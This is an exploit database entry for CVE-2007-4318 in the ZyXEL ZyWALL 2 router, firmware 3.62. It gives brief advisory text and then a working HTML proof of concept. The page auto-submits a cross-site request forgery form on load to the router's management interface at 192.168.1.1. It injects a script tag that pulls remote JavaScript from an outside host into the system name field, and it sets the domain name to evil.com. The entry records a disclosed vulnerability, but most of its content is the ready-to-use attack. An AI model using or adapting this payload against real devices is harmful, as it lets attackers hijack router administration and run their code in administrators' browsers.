ZYXEL ZyWALL 2 3.62 - '/Forms/General_1?sysSystemName' Cross-Site Scripting
Author: Henri Lindberg
type: remote
platform: hardware
port:
date_added: 2007-08-10
date_updated: 2013-12-25
verified: 1
codes: CVE-2007-4318;OSVDB-38721
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/25262/info
ZyXEL ZyWALL 2 is prone to multiple remote vulnerabilities that affect the management interface.
An attacker can exploit these issues to carry out cross-site request forgery, HTML-injection, and denial-of-service attacks.
ZyWALL 2 running with firmware V3.62(WK.6) is reported vulnerable to this issue.
<html>
<body onload="document.CSRF.submit()">
<FORM name="CSRF" METHOD="POST"
ACTION="http://192.168.1.1/Forms/General_1">
<INPUT NAME="sysSystemName" VALUE="<script src='http://nx.fi/X'>"
<INPUT NAME="sysDomainName" VALUE="evil.com">
<INPUT NAME="StdioTimout" VALUE="0">
<INPUT NAME="sysSubmit" VALUE="Apply">
</form>
</body>
</html>